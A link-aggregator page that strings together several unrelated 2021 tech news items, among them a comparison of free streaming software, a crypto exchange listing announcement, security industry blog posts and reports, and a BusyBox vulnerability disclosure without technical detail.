I quit my job at the start of 2020. Two months later, the U.S. went into lockdown and everyone glued themselves to their screens. So, like many avid gamers, I started streaming on Twitch. After deciding what to stream and when, and acquiring a webcam, I had to pick my broadcasting software. When youre starting out as a streamer, your budget, or lack thereof, is going to be a major factor. And to this day, I havent felt the need to move to a paid broadcasting platform because so much can be accomplished with free options.

After a casual Google search, I initially settled on XSplit. The setup process was fairly straightforward, which took a lot of the guesswork and scouring the net for guides out of the equation. XSplit is probably best known for allowing users to stream content to multiple platforms, like Twitch, Facebook Gaming, and YouTube. It also boasts the ability to tweak video settings for resolution up to 4k and frames per second well above the standard 60fps.

That said, XSplit requires you to either create an account or sign in with an existing social media account. And unless you pay for an XSplit subscription, youll only be able to stream to a single platform, and quality levels will be capped at 720p and 30fps.

Its also important to note that the features differ on each platform. For example, Twitch does not support 4k resolution in streams while YouTube, on the other hand, does. Also, while XSplit allows for higher framerate settings, Twitch, Facebook Gaming, and YouTube all recommend streaming at no higher than 60fps.

When I first started, I got set up on Twitch, then decided to maximize my potential audience by creating a Facebook page and streaming to both sites simultaneously, though not with XSplit, as streaming to multiple sources is a premium feature. Then I qualified for the Twitch Affiliate program.

Without getting too off-topic, Im going to remind everyone of the importance of reading contracts. One of the stipulations that many streamers miss in the Twitch Affiliate contract is that Twitch owns the exclusive rights to every one of their streams for 24 hours, which means that everything, including clips, cannot be uploaded or streamed on another platform. I promptly stopped dual-streaming to Facebook.

I had a lot of success using XSplit. Its a solid piece of software and has received numerous updates since I first tried it. But, in my search for the best combination of options and features from free software, I decided to move on to a different program: Open Broadcaster Software.

Aptly named, OBS is open source, which means that power users can code their own plugins and casual users can download and use them. This also means that bugs are usually caught and fixed quickly, and its usually the first program to get new updates.

The setup process for OBS is both simpler and more complicated than the setup for XSplit while the initial download and run installer work in its favor, OBS requires much more tweaking to ensure the best stream quality for your audience. The manual setup can take some serious time and research.

On top of that, OBS lacks a chat overlay and customizable themes out of the box. These stream theme overlays must be separately downloaded and manually installed, which isnt terribly difficult but takes more effort than other options.

But it isnt all bad. OBS has plenty of advantages, too. Unlike XSplits free version, OBS allows for livestreaming at 1080p and 60fps, taking full advantage of the recommended limits. Its also less resource-intensive, saving your CPU for more important things like your game. OBS also supports multi-platform streaming.

OBS was good to me, but I never felt like it clicked. The options available for making my stream look and feel the way I wanted just werent available. Instead, my strongest recommendation for a free broadcasting software goes to Streamlabs platform.

Streamlabs is a company built for livestreamers. Because OBS is open source, users have been able to build out their own versions on top of it, enabling streamers to choose from all kinds of premade tools, like chat monitoring bots and overlays. But thats not all Streamlabs does. It also has tools for building your community and editing your clips.

Streamlabs setup process is the easiest by far, taking advantage of Open Broadcaster Softwares plug-and-play approach. The key difference, however, lies in the built-in optimizer. Rather than having to manually select the best settings for your stream machine, the optimizer takes care of everything for you.

Where Streamlabs really shines, though, is in its customization options. Both OBS and Streamlabs have adjustable user interfaces. Simply click and drag the various informational boxes around the window to suit your needs. But Streamlabs makes personalizing the layout and design that your audience sees and interacts with much more convenient.

Streamlabs also has a bunch of free overlays available on its site. Instead of hunting for a stream overlay that matches your style and vibe, then downloading and going through the trouble of integrating it into OBS, you can simply install it directly with the click of a button. Remember to keep your hardware limits in mind, though, as every additional tool running on top of Streamlabs will take more power from your CPU.

How you set up the streaming experience and manage the backend can greatly impact your audiences first impressions, as well as make watching the stream more enjoyable. Animated backgrounds, chat management bots, and sound alerts create a more engaging experience. And it will take time to curate the perfect blend of immersive and meta features that make your stream unique.

Youll also want to be comfortable working with the settings and tweaking your streams visuals and sound effects. While Streamlabs is the clear winner of the big three free options, some companies that offer sponsorship deals will be partnered with another companys platform, like StreamElements OBS.

(While I was writing this article, controversy rose surrounding Streamlabs new premium service. Despite feeling conflicted about recommending Streamlabs, I still believe that their free broadcasting software is the best choice for streamers. Id encourage you to look further into the situation and weigh the options for yourself.)

Whether you are starting to stream as a hobby or hoping to turn it into your next career move, livestreaming requires some serious legwork. The best thing you can do is be informed of the pros and cons of each option, and choose the best fit for your streaming needs.

Here is the original post:

XSplit, OBS, or Streamlabs: Whats the best free streaming software - Polygon

INTERNET CITY, DUBAI, Nov. 18, 2021 LBank Exchange, a global digital asset trading platform, will list Chives coin (XCC) on November 19, 2021. For all users of LBank Exchange, the XCC/USDT trading pair will be officially available for trading at 20:00 (UTC+8) on November 19, 2021.

Since the birth of cryptocurrencies such as bitcoin and Ethereum, the discussions of environmental pollution and energy wasting caused in their mining process have never stopped. As a completely decentralized, no reservation, no ICO, and community autonomy green cryptocurrency, Chives coin (XCC) can create a low-power, green and environmentally friendly blockchain system. The XCC token will be listed on LBank Exchange at 20:00 (UTC+8) on November 19, 2021, to further expand its global reach and help it achieve its vision.

Chives is an eco-friendly blockchain based on proof of space and time (PoST) without pre-mine and ICO. Its not affiliated with Chia Network Inc., but is built on Chias outstanding open source code. As a hard fork created by community volunteers, in order to prevent large mining pools from dominating, Chives uses a combination of PoST and proof of service (PoSE).

Farmers of Chives can use free hard disk space to mine 90% of Chives openly, fairly and transparently. The income of Chives farmers is proportional to the amount of allocated space. If a farmer has 10 times more space, the farmer will get 10 times more rewards. Chives is proof that modern blockchains can be eco-friendly, safe, and effective at the same time.

The Chives project pays special attention to the development of an eco-friendly blockchain, as well as related technological products. The Chives network supports a token issuance mechanism similar to ERC-20 and supports an NFT issuance mechanism similar to ERC-721. At the moment, the project has already developed its own Chives Swap exchange, a web wallet, and a marketplace for selling pets for the future NFT game.

The game will directly promote the application and popularization of core products such as stable coins (USDT), tokens (ERC-20), NFT (ERC-721), automated exchanges (AMM), and mobile wallets on the Chives blockchain. This greatly contributes to the growth and popularization of the Chives network and will bring various ecological designs on the Chives blockchain to a new level.

The entire Chives is based on the Chia branch, adding an asset mortgage, community autonomy, budget review and other functions. 90% of chives are allocated to miners and the remaining 10% is allocated to participants who contribute to the Chives community ecosystem. Chives upholds the spirit of openness and open source, and encourages people from all walks of life to work together to promote the development of Chives.

The goal of the Chives project is to create an independent community and a global decentralized payment network using its own cryptocurrency, called Chives or XCC, as the main payment method. The XCC token will be listed on LBank Exchange at 20:00 (UTC+8) on November 19, 2021, investors who are interested in Chives coin investment can easily buy and sell XCC on LBank Exchange by then. The listing of XCC on LBank Exchange will undoubtedly help it further expand its business and draw more attention in the market.

Learn More about XCC Token:

Official Website: https://www.chivescoin.orgTwitter: https://twitter.com/chives_projectTelegram: https://t.me/chives_network

Listing Announcement on LBank Exchange: https://support.lbank.site/hc/en-gb/articles/4409594129177Chives-coin-XCC-will-be-listed-on-LBank

LBank Exchange, founded in 2015, is an innovative global trading platform for various crypto assets. LBank Exchange provides its users with safe crypto trading, specialized financial derivatives, and professional asset management services. It has become one of the most popular and trusted crypto trading platforms with over 6.4 million users in more than 210 countries around the world.

Visit us on social media:

l Facebookl Twitterl LinkedIn

Contact Details:

LBK Blockchain Co. LimitedLBank Exchangemarketing@lbank.info

Original post:

LBank Exchange Will List Chives coin (XCC) on November 19, 2021 - bitcoinist.com

The way organizations build web applications has changed dramatically over the last several years. As a result, many organizations are considering additional security strategies to augment the Web Application Firewall (WAF) on which they have relied to protect critical digital business operations from vulnerabilities. New technology has created a development environment where the web application threat landscape grows larger and more complex every day. Fortunately, there are solutions available to shore up your web application security and account for vulnerabilities you may not know you had. Implementing these solutions will require you to think differently about web application security. In this post, well talk about what has changed in the web application development process that makes you vulnerable to different threats and why relying on patching alone to address them may no longer be sufficient. Well also explain how a shift-left, inside out approach with a unified security model will augment the protection you get from your WAF and create a more sustainable and scalable application security strategy.

Every year, we discover new vulnerabilities in commercial, off-the-shelf software, open source libraries or in dependencies introduced by other applications. The number of vulnerabilities has exploded over the last few years. As we wrote more code to create more applications, we used better tooling and better analysis to find them. Another cause of the vulnerability explosion lies in the way organizations compose applications. Developers are moving beyond traditional web application building methods and introducing elements such as APIs and micro services which bring their own vulnerabilities into the mix.

Legitimate web application developers are not the only people out there looking for vulnerabilities. Imperva Research Labs reported that in the first half of 2021, Imperva blocked 40% more web application incidents in the financial services industry than over the same time period in 2020. Given what we know, this is not a surprise. The COVID pandemic has left lots of prospective attackers sitting at home out of work, potentially looking for different avenues to get money. The tools required to affect attacks have been democratized over the years, making it easier and cheaper than ever to constantly take pot shots at applications and see what sticks. This generation of bad actors has the time and motivation to look for and exploit vulnerabilities to launch attacks on high value targets like financial services.

Applications may be categorized as first party applications and third party applications. First-party applications are those that your organization writes and develops themselves. Lets say an eCommerce company has a website where people can add items to a shopping cart and buy them when they check out. The website is a first-party application. If this company doesnt do the check out, but instead, employs another system, component, microservice, or API to do it, then they are using a third-party application working in conjunction with the first party application (website). Some organizations have zero development capabilities and use only third-party applications, something as simple as off-the-shelf software they deploy in their environment.

Historically, organizations have had control over first-party applications (there are blind spots that well address later). You have control over your own code, you can audit some of the open-source code thats coming into your environment, and so you have some level of observability. However, with most tools, you dont really have visibility into the security of third-party applications, you find yourself virtually taking the vendors word that they are protected.

The key element that stretches between first and third-party applications is risk, and both types of applications can introduce risk back into the overall environment that you need to manage to protect your applications. One risk mitigation technique is to draw a firewall between first and third-party applications. As the threat landscape grows, this is unlikely to be sufficient. Even if your vendor patches a zero-day vulnerability, the response may be inexact, take too long, and fail to prevent the code vulnerability from showing up everywhere in your environment.

In 2021, the non-profit organization Open Web Application Security Project (OWASP) which helps website owners and security experts protect web applications from cyber attacks introduced for the first time the concept of insecure design as the 4th most important security risk affecting web applications. This represents an overall realization that developers should consider a shift left approach to application security, putting a greater emphasis on more rigorous threat modeling or secure design upfront in the process. Going forward, application developers may need to consider compensating controls as part of their overall design to counter bringing in risky third party code that has unknown vulnerabilities.

OWASPs greater emphasis this year on the risks of using components with known vulnerabilities is really a sign of the times in terms of whats going on with supply chain attacks. There are more bad actors than ever trying to compromise supply chain vulnerabilities. The most efficient way to wreak supply chain havoc is to compromise a library or component that many organizations use.

Traditional security methods are highly effective at stopping threats from the outside that are trying to break into an environment, but are ineffective at stopping supply chain attacks because you just dont see whats going on inside of the application. As the code base and the number of dependencies increase, developers need to understand exactly whats going on in or around applications in the software supply chain, whether its bad dependencies or bad packages or solutions that are around the core application, in either first party or third party applications.

In the positive security model, you allow the application to do what it does based on its current behavior and anything outside of that behavior or abnormal behavior is just not going to work. You dont require any signatures or updates and you can protect the entire stack. You can easily deploy it by flipping a switch, no need to constantly update it with patches, and no risk of degrading the applications performance. This is where runtime protection (RASP) comes in. RASP is a light-weight agent that attaches to your applications and, unlike a firewall, which protects from the outside, in this solution, RASP offers code-level protection from the inside out. RASP lives squarely in the realm of development and security,

A web application firewall is great at stopping attacks compromising known vulnerabilities. In instances where an attack targets unknown vulnerabilities in certain code in the applications themselves, a unified positive security model including RASP provides more targeted controls designed to automatically mitigate those types of attacks. The same thing applies to client side attacks, which target the users in their actual browser environments themselves. With visibility from inside the application, Imperva RASP is able to understand how the individual components are working with one another and offer automated mitigation in order for enterprises to focus on business logic without compromising on security.

Deficiencies in so many organizations ability to protect the overall supply chain have driven changes in todays regulatory landscape, and RASP is now frequently identified in regulations as an effective control in delivering that protection.

This post was adapted from the webinar, Mitigate Vulnerabilities in Application Code Without Emergency Patching. Watch it on demand here.

See RASP in action yourself. Start a free trial today.

The post Protecting todays web applications requires more than a firewall appeared first on Blog.

*** This is a Security Bloggers Network syndicated blog from Blog authored by Bruce Lynch. Read the original post at: https://www.imperva.com/blog/protecting-todays-web-applications-requires-more-than-a-firewall/

Read this article:

Protecting todays web applications requires more than a firewall - Security Boulevard

To software developers, the process of creating a hardware product can seem distinctly 1980s. Even in the most high-tech of work flows, there are tons of error-prone and potentially expensive manual, steps including spreadsheets, confusion and a general feeling of the will to live sagging away through the musty, solder-stained floorboards of the hardware development shop. Along comes Duro and the $4 million the company just raised, in an attempt to bring some agile methodology sanity to a final-bill-of-materials.top-assembly.final.final.final.final.no-really-final-this-time.xls world.

Duros fundraising round was led by B2B SaaS investors Bonfire Ventures, with follow-on money from hard-tech investors Riot Ventures.The new funding will be used to expand sales and marketing teams and to further develop Duros product lifecycle management (PLM) solutions.

I am a former electrical engineer. For 20 years I designed and manufactured products IoT, Drones, telecom equipment, wearables, cleantech, you name it. I got frustrated with how much of my time was being spent managing the most fundamental elements of hardware development: CAD files, your bill of materials and your supply chain data, explains Duros CEO Michael Corr. Theres a product category called Product Lifecycle Management or PLM which is meant to be a receptacle for that information for centralizing and managing it. It includes revision control, and you use it with your own teams, as well as sharing it with your contract manufacturers. And yet none of the tools I used were actually saving time or actually providing value at the end of the day. Its all done so manually and is so process-driven that it was often easier to just use spreadsheets. Thats still the prevalent technology today, because the established tools are just so damn complicated and prone to error, and theyre not actually providing value.

With an axe to grind against the status quo, co-founders Michael Corr and Kellan OConnor developed Duro as a cloud platform to centralize all product data and remove the friction of connecting disparate teams and tools. The goal is transparency and giving everyone from the product teams, the engineering teams and the suppliers and manufacturing teams access to the most accurate and most recent data at all times.

To simplify things a little, the hardware industry is dominated by a bimodal culture. You have the older generation that came into the workforce in the 80s and 90s, who established these toolsets that we have today. Meanwhile, there is a gap young engineers were more interested in learning web, mobile and app development, as it was so much more in vogue. There wasnt a continuation of young engineers entering the hardware space, Corr outlines the market landscape where Duro is staking out its territory. But now theyre coming back. Hardware has proven itself to be a sexy product. IoT happened, and the cost of developing hardware came down drastically. Now what we are seeing is a wave of a younger generation of engineers thats entering the workforce. They are the ones that Duro is going after. They are used to the culture from software development, and they have different standards for the software they use.

In other words, where SaaS, GitHub and dev/ops processes completely changed how software is delivered on an ongoing basis, Duro wants to take similar mechanics and invite the hardware folks to join the current millennium.

GitHub did an excellent job of proving that it can be done. You can have a single cloud-hosted source of your source code control, and then you build an ecosystem of tools and people and tasks around it. And everyones always pointing to GitHub. In the hardware industry, traditionally, that hasnt been the case. You have multiple teams, doing their disparate responsibilities: electrical engineering, mechanical engineering, procurement, manufacturing, etc. Because there hasnt been a concept of centralizing it, everybody has their own copy of the data, explains Corr. Everybody has their own separate copy of the bill materials, for example, and that creates a problem. It creates this additional necessity of overhead to manage all those communication channels and making sure that everybody has the latest copy.

Were incredibly excited to partner with Duro, which is bringing a fresh solution to a big market dominated by old companies. When a startup like Duro lowers the barrier to entry for a whole new set of users, it positions them to get the lions share of that new addressable market, said Jim Andelman, co-founder and managing director at Bonfire Ventures. Customer affinity for Duros platform is off the charts: its clear to us that this is the PLM solution of choice for engineering-driven businesses.

In addition to the product itself, the company is innovating on its business model, taking a leaf out of the SaaS playbook.

Theres a lot of friction in software sales for hardware in the past. Very expensive applications, driven by user-license business models. And there are rarely trials available if you want to use it, you just have to pay for and just accept what you get. So Duro innovates a little bit there too. We have three subscription packages. The starter package allows companies who know that spreadsheets are not a good solution and want to get into properly managed data, centralized and controlled environments. The Pro version works right out of the box, without the complex configuration and setup needed by other products. Its designed for teams who are at the cusp of doing its first round of production, and want to do proper revision control interface with their suppliers, explains Corr. Our enterprise package is more the expansive package for teams that have outgrown those lower two tiers, or that are just more established and they have existing workflows.

The starter package is $450 a month or $5,400 a year. The Pro package weighs in at $750 per month or around $9,000 per year. The enterprise package is a little bit more open ended, depending on the needs of the customer. The Duro team told me that they have contracts ranging from $25,000 to $100,000, depending on how the software is configured.

Given our extensive experience investing in full-stack businesses, we know that issues surrounding data continuity are synonymous with hardware manufacturing and weigh heavily on the industry, said Will Coffield, co-founder and general partner at Riot Ventures. We love Duros approach to modernizing hardware design/development, using automation to replace manual processes and connect teams to information for intelligent and efficient collaboration.

Read the original:

Duro drags hardware product development into the age of agile - TechCrunch

Hackers rarely actually break-in, instead they simply log in, is a worn clich among computer security protagonists. Hackers can and do exploit defects in software code where errors by the original authors are then manipulated to enable unintended access.

If you are a Windows, Mac, Android or iPhone user, no doubt you receive regular notices that your device should now be updated to the latest version of its host software, so as to repair newly discovered security vulnerabilities.

But if a hacker can discover or deduce the password credentials for an account, it is obviously much simpler to just log in using these and so gain access.

Passwords have been critical to protect online access to our email, online shopping carts, newspaper subscriptions, bank accounts and much more. We are strongly advised that we should never use the same password for different services, never make them too short, and never make them easy to guess. We should always change them regularly, should always use random collections of numbers and letters and punctuation marks, and should keep them private.

In short, they are incredibly inconvenient but apparently an awkward necessity for our digital lives.

Help with remembering passwords is offered by digital vaults and password managers that can administer your password portfolio on your behalf. They can synchronise passwords across the different devices you may own, and usually offer to scan the dark web looking for any compromised accounts.

However the industry, led by Google, Microsoft, Apple and others, is now rapidly moving to a password-less world in which passwords can be completely avoided. The most obvious alternatives are based on bio-metrics, such as scanning your face or a fingerprint.

But you may baulk at major multinationals easily accumulating a huge collection of personal identity information across much of the planet, potentially invaluable to governments and police agencies alike.

Whatever the pros and cons of various authentication approaches for us to log in to our computers, you may not realise that software systems also make extensive use of passwords. These are in the form of digital api keys to gain access to databases and other software services across the web.

These authentication credentials are not at all intended to be remembered by humans, and so usually take the form of lengthy collections of letters and numbers, randomly generated as needed.

Unlike a login password which identifies a particular user, they instead identify a particular software application, component or subsystem that may in fact be used by very many human users.

For example, if a particular app on your smart device uses a Google map such as a taxi-hailing app, or a courier or food delivery app the app must present its api key to Googles mapping service each time the app is run and regardless of which particular user happens to be running the app. The api key is set when the app was built, and is used by Google to verify legitimate use of its mapping service by an authorised app.

Digital keys are routinely used within application software to access payment services, databases, and other web services.

While Google does not charge app developers for integrating its mapping service into their apps, some software services offered over the web to developers do charge for their use. The api key is then critical to authenticating and charging the relevant app owner, who may then recover the cost by charging app fees to end users.

Thankfully when you use an app, you do not need to know these various internal api keys in addition to your own personal passwords. Nevertheless, the keys must appear somewhere deep within the system, and are a potential security vulnerability. If a hacker discovers such a digital secret, they can potentially script software to explore a service and any data which it may have accumulated, or run up costs for fraudulent use.

Software developers frequently work in teams, and may also re-use software published in open source by the community in software repositories. It is not unusual to find api keys and authentication credentials unintentionally published within software source code.

Fortunately for software developers, there are a number of tools which can scan the source code, searching for keys and credentials associated with particular web-based services, and generate an appropriate warning if discovered.

But in the same way that users are being encouraged to go password-less and rely instead on other authentication mechanisms, innovation may ultimately displace the need for api keys, so removing authentication vulnerabilities and also avoiding the need for scanning and detection tools.

A more sophisticated approach might use a two-stage or even a multistage handshake, and perhaps only be run in full when an app is installed or updated.

Digital authentication is an intriguing innovation space because of the counter-measures, and counter-counter-measures continuously being conceived by the good and bad guys alike.

Link:

Chris Horn: Digital authentication is an intriguing innovation space - The Irish Times

SAP is expanding its tools and services for developers of all skill levels, with several announcements from this week's SAP TechEd 2021 virtual conference.

SAP TechEd is an annual gathering of the SAP developer community that provides information on new tools and services, along with learning content and sessions that enable SAP developers to expand their skills.

For experienced developers, SAP is now providing individual access to the free tier model of SAP Business Technology Platform (BTP), SAP's integrated development environment. Previously, SAP BTP was available to only licensed SAP customers and partners.

SAP is also now offering its veteran Advanced Business Application Programming (ABAP) developers a cloud-ready development environment for the programming language inside SAP S/4HANA Cloud. Formally named SAP S/4HANA Cloud ABAP Environment, the new platform is derived from the SAP BTP ABAP cloud environment known as Steampunk and is referred to as "Embedded Steampunk."

For business users with limited development skills or citizen developers, SAP made SAP AppGyver generally available. SAP AppGyver is a low-code/no-code development platform that SAP acquired in February. The platform will be available in SAP BTP.

In order to enhance the skills of developers at all levels, SAP launched a new SAP Learning site, which contains learning content including expert-led sessions, hands-on training and microlearning videos.

The intent behind the SAP TechEd announcements is to provide developers with tools and services to build applications that can address some of the challenges businesses face, including the pandemic, global climate change and inequality, said Juergen Mueller, CTO at SAP, said during his executive keynote at the SAP TechEd.

Opening the free tier for SAP BTP is something that SAP developers have been asking for, he said.

"SAP BTP is now available to individual developers, so you can now discover and experience SAP BTP services without any financial commitment," Mueller said. "This has been a journey that many [SAP developers] have been following very closely and have contributed actively to this milestone."

One of the problems companies are facing is a shortage of skilled developers, which makes the availability of low-code/no-code platforms like AppGyver and the opportunity to build skills through SAP Learning site more important than ever, according to Mueller.

"A huge technology talent gap is opening up that needs to be filled, so SAP is giving open access to learning resources and providing low-code and no-code solutions as a way out of this dilemma," he said.

The products and services announced at TechEd should provide value for various developer levels, said Tammy Powlas, a business analyst and SAP Mentor, an SAP technology advocate selected by members of the SAP community, who works at a utilities company. She pointed specifically to individual access to the free tier for SAP BTP and general availability of AppGyver.

"I know as a [Project Management Professional] that the Project Management Institute says there's a shortage of developers and the citizen developer is the answer, so it's good to see SAP focus on AppGyver as the low-code and no-code solution."

The Learning site, SAP's relaunched learning center, is a key for developer success, she said.

"What links these all together is the free SAP Learning site that includes free training for low-code/no-code and SAP BTP solutions," Powlas said.

The new tools and services fill some gaps that needed to be filled for SAP developers, said Holger Mueller, vice president and principal analyst at Constellation Research.

AppGyver, for example, is an overdue item in SAP's low-code toolset, which should see more uptake now that it's embedded in SAP BTP, Mueller said.

"The free tier access forSAP BTP is a good move but SAP needs to convince on its merit, but they are not there yet," he said. "The S/4HANA Cloud ABAP Environment, Embedded Steampunk, is very good and overdue, this is the one key announcement for the existing customer and ecosystem."

SAP needs to get in the game against the developer tool sets from public cloud hyperscalers Amazon, Google Cloud Platform and Azure, which are becoming go-to developer environments for professional development and low-code/and no-code development, said Joshua Greenbaum, principal at Enterprise Applications Consulting. He said he believes the announcements from TechEd are a step in that direction and should help developers stay within the SAP platforms to build applications.

"SAP wants these extensions, net-new developments, citizen apps, RPA -- everything possible -- to run on SAP BTP because that makes their platform sticky and helps them fend off the hyperscalers who are making big inroads into their own developer communities," Greenbaum said.

Indeed, SAP appears to have gotten the free tier for SAP BTP right, agreed Jon Reed, co-founder of Diginomica, an enterprise computing industry analysis firm.

"It was a long time coming, and developers and [SAP developer] community leaders have been pressing SAP for this kind of developer agreement for years," he said. "We need to see how it plays out, but it appears that SAP now has a free tier on par with the hyperscalers and open source development environments."

SAP's commitment to low-code and no-code is clear and useful for both experienced and citizen developers, Reed said, but the availability of SAP AppGyver is a little underwhelming given the availability of low-code tools.

"Making AppGyver available to more citizen developers is welcome, but there are multiple tools for different uses, including third-party tools," he said. "SAP needs to provide more roadmap guidance and use case clarity on its various low-code environments going forward, like AppGyver, Ruum and Business Application Studio."

But Greenbaum countered that having a wealth of low-code and no-code options that all perform different functions -- AppGyver is particularly suited to building iOS and Android mobile interfaces -- is not a bad thing.

"It's both the blessing and the curse of any large enterprise software company, not just SAP, to have a confusing number of options," he said. "Everyone gets a little baffled, but any good bar has a good selection of beers, so it's about what people want."

The main goal for SAP in offering the development platforms and services is to prove that it's still an innovating enterprise company, Greenbaum said.

"SAP really has to build back its developer community," he said. "It has to build back this sense that they are the leading-edge innovators and break away from what it's tending to look like, which at times is just the legacy place to go to keep the lights on. If they don't capture innovation at the edge, they're doomed to legacy ERP status."

Jim O'Donnell is a TechTarget news writer who covers ERP and other enterprise applications for SearchSAP and SearchERP.

Here is the original post:

SAP TechEd sets sights on hyperscalers with developer tools - TechTarget

2021 Software Vulnerability Snapshot report examines prevalence of vulnerabilities identified by Synopsys Application Security Testing Services.

MOUNTAIN VIEW, Calif., Nov. 16, 2021 /PRNewswire/ -- Synopsys, Inc. (Nasdaq: SNPS) today published "2021 Software Vulnerability Snapshot: An Analysis by Synopsys Application Security Testing Services," a report examining data from 3,900 tests conducted on 2,600 targets (i.e., software or systems) during 2020. The data, compiled by tests performed by Synopsys security consultants in our assessment centers for our customers, included penetration testing, dynamic application security testing, and mobile application security analyses, designed to probe running applications as a real-world attacker would.

Eighty-three percent of the tested targets were web applications or systems, 12% were mobile applications, and the remainder were either source code or network systems/applications. Industries represented in the tests included software and internet, financial services, business services, manufacturing, media and entertainment, and healthcare.

"Cloud-based deployments, modern technology frameworks, and the rapid pace of delivery is forcing security groups to react more quickly as software is released," said Girish Janardhanudu, vice president, security consulting at Synopsys Software Integrity Group. "With insufficient AppSec resources in the market, organizations are leveraging application testing services such as those Synopsys provides in order to flexibly scale their security testing. We've seen a heavy increase in assessment demand throughout the pandemic."

In the 3,900 tests conducted, 97% of the targets were found to have some form of vulnerability. Thirty percent of the targets had high-risk vulnerabilities, and 6% had critical-risk vulnerabilities. The results demonstrate that the best approach to security testing is to utilize the wide spectrum of tools available to help ensure an application or system is free from vulnerabilities. For example, 28% of the total test targets had some exposure to a cross-site scripting (XSS) attack, one of the most prevalent and destructive high- /critical-risk vulnerabilities impacting web applications. Many XSS vulnerabilities occur only when the application is running.

Story continues

Other report highlights

2021 OWASP Top 10 vulnerabilities were discovered in 76% of the targets. Application and server misconfigurations were 21% of the overall vulnerabilities found in the tests, represented by the OWASP A05:2021Security Misconfiguration category. And 19% of the total vulnerabilities found were related to the OWASP A01:2021Broken Access Control category.

Insecure data storage and communication vulnerabilities plague mobile applications. Eighty percent of the discovered vulnerabilities in the mobile tests were related to insecure data storage. These vulnerabilities could allow an attacker to gain access to a mobile device either physically (i.e., accessing a stolen device) or through malware. Fifty-three percent of the mobile tests uncovered vulnerabilities associated with insecure communications.

Even lower-risk vulnerabilities can be exploited to facilitate attacks. Sixty-four percent of the vulnerabilities discovered in the tests are considered minimal-, low-, or medium-risk. That is, the issues found are not directly exploitable by attackers to gain access to systems or sensitive data. Nonetheless, surfacing these vulnerabilities is not an empty exercise, as even lower-risk vulnerabilities can be exploited to facilitate attacks. For example, verbose server bannersfound in 49% of the testsprovide information such as server name, type, and version number, which could allow attackers to perform targeted attacks on specific technology stacks.

An urgent need for a software Bill of Materials. Of note was the number of vulnerable third-party libraries in use, found in 18% of the penetration tests conducted by Synopsys Application Testing Services. This corresponds with the 2021 OWASP Top 10 category A06:2021Use of Vulnerable and Outdated Components. Most organizations typically use a mix of custom-built code, commercial off-the-shelf code, and open source components to create the software they sell or use internally. Often those organizations have informalor noinventories detailing exactly what components their software is using, as well as those components' licenses, versions, and patch status. With many companies having hundreds of applications or software systems in use, each themselves likely having hundreds to thousands of different third-party and open source components, an accurate, up-to-date software Bill of Materials is urgently needed to effectively track those components.

To learn more, download the "2021 Software Vulnerability Snapshot: An Analysis by Synopsys Application Security Testing Services," or read the blog post.

About the Synopsys Software Integrity Group

Synopsys Software Integrity Group helps development teams build secure, high-quality software, minimizing risks while maximizing speed and productivity. Synopsys, a recognized leader in application security, provides static analysis, software composition analysis, and dynamic analysis solutions that enable teams to quickly find and fix vulnerabilities and defects in proprietary code, open source components, and application behavior. With a combination of industry-leading tools, services, and expertise, only Synopsys helps organizations optimize security and quality in DevSecOps and throughout the software development life cycle. Learn more at http://www.synopsys.com/software.

About Synopsys

Synopsys, Inc. (Nasdaq: SNPS) is the Silicon to Software partner for innovative companies developing the electronic products and software applications we rely on every day. As an S&P 500 company, Synopsys has a long history of being a global leader in electronic design automation (EDA) and semiconductor IP and offers the industry's broadest portfolio of application security testing tools and services. Whether you're a system-on-chip (SoC) designer creating advanced semiconductors, or a software developer writing more secure, high-quality code, Synopsys has the solutions needed to deliver innovative products. Learn more at http://www.synopsys.com.

Editorial Contact: Liz SametSynopsys, Inc. 703-657-4218esamet@synopsys.com

Cision

View original content:https://www.prnewswire.com/news-releases/synopsys-research-finds-vulnerabilities-in-97-of-applications-36-impacted-by-critical--or-high-risk-vulnerabilities-301425386.html

SOURCE Synopsys, Inc.

Continued here:

Synopsys Research Finds Vulnerabilities in 97% of Applications, 36% Impacted by Critical- or High-Risk Vulnerabilities - Yahoo Finance

Team82 and JFrog have announced the discovery, by using static and dynamic techniques, of 14 vulnerabilities affecting the latest version of BusyBox.

Typically found in embedded devices with limited memory and storage resources, BusyBox is marketed as the Swiss Army Knife of embedded Linux. It's a software suite of useful Unix utilities, known as applets, packaged as a single executable file.

Busybox can be found on many OT and IoT devices, including popular programmable logic controllers (PLCs), human-machine interfaces (HMIs), and remote terminal units (RTUs) - many of which now run on Linux.

As part of a commitment to improving open-source software security, Claroty's Team82 and JFrog collaborated on a vulnerability research project examining BusyBox.

To research BusyBox, they used static and dynamic analysis approaches. First, a manual review of the BusyBox source code was conducted in a top-down approach (following user input up to specific applet handling). They also looked for obvious logical or memory corruption vulnerabilities.

The next approach was fuzzing. They compiled BusyBox with ASan and implemented an AFL harness for each BusyBox applet. Each harness was subsequently optimised by removing unnecessary parts of the code, running multiple fuzzing cycles on the same process (persistent mode), and running multiple fuzzed instances in parallel.

Details of the vulnerabilities

According to the collaboration, since the affected applets are not daemons, each vulnerability can only be exploited if the vulnerable applet is fed with untrusted data - usually through a command-line argument.

Specifically, these are the conditions that must occur for each vulnerability to be triggered:

CVE-2021-42373

CVE-2021-42374:

CVE-2021-42375:

CVE-2021-42376:

CVE-2021-42377:

CVE-2021-42378, CVE-2021-42386:

"We started from fuzzing all the daemon applets, including HTTP, Telnet, DNS, DHCP, NTP etc. Many code changes were required in order to effectively fuzz network-based input," the companies explain.

"For example, the main modification we performed was to replace all recv functions with input from STDIN to support fuzzed inputs. Similar changes were done when we fuzzed non-server applets as well."

Claroty's Team82 and JFrog prepared a couple of examples for each applet and ran hundreds of fuzzed BusyBox instances for a few days.

"This gave us tens of thousands of crashes to evaluate. We had to create classes of crashes with the same root cause to help reduce the volume of crashes we had in our sample set. Later, we minimised each group representative to work with a small subset of unique crash inputs," they say.

To fulfil these tasks, the team developed automatic tooling that digested all crash data and classified it based on the crash analysis report, which mainly includes the crash stack trace, registers, and assembly code of the relevant code area. For example, they merged cases with similar crash stack traces because they usually had the same problematic root cause.

Finally, the team researched each unique crash and minimised its input vector in order to understand the root cause, which allowed them to create a proof-of-concept that exploits the vulnerability responsible for the crash. In addition, they tested their PoCs against several BusyBox versions to understand when the bugs were introduced to the source code.

Threat Analysis and mitigation advice

To assess the threat level posed by these vulnerabilities, Team82 and JFrog inspected JFrog's database of more than 10,000 embedded firmware images. The team found that 40% of them contained a BusyBox executable file that is linked with one of the affected applets, making these issues extremely widespread among Linux-based embedded firmware.

According to Claroty, all 14 vulnerabilities have been fixed in BusyBox 1.34.0 and users are urged to upgrade immediately.

See more here:

